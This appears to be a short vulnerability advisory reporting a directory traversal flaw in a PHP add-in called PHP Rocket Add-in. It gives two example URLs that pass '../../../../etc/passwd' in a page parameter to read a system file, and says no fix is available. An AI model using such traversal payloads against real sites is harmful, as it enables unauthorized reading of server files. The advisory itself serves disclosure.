|
COMMAND PHP Rocket Add-in allows read access to files SYSTEMS AFFECTED PHP Rocket Add-in PROBLEM Zaleth tried : http://www.someuser.com/phprocketaddin/?page=../../../../etc/passwd http://www.someuser.com/index.php?page=../../../../etc/passwd ... and it worked. SOLUTION Not yet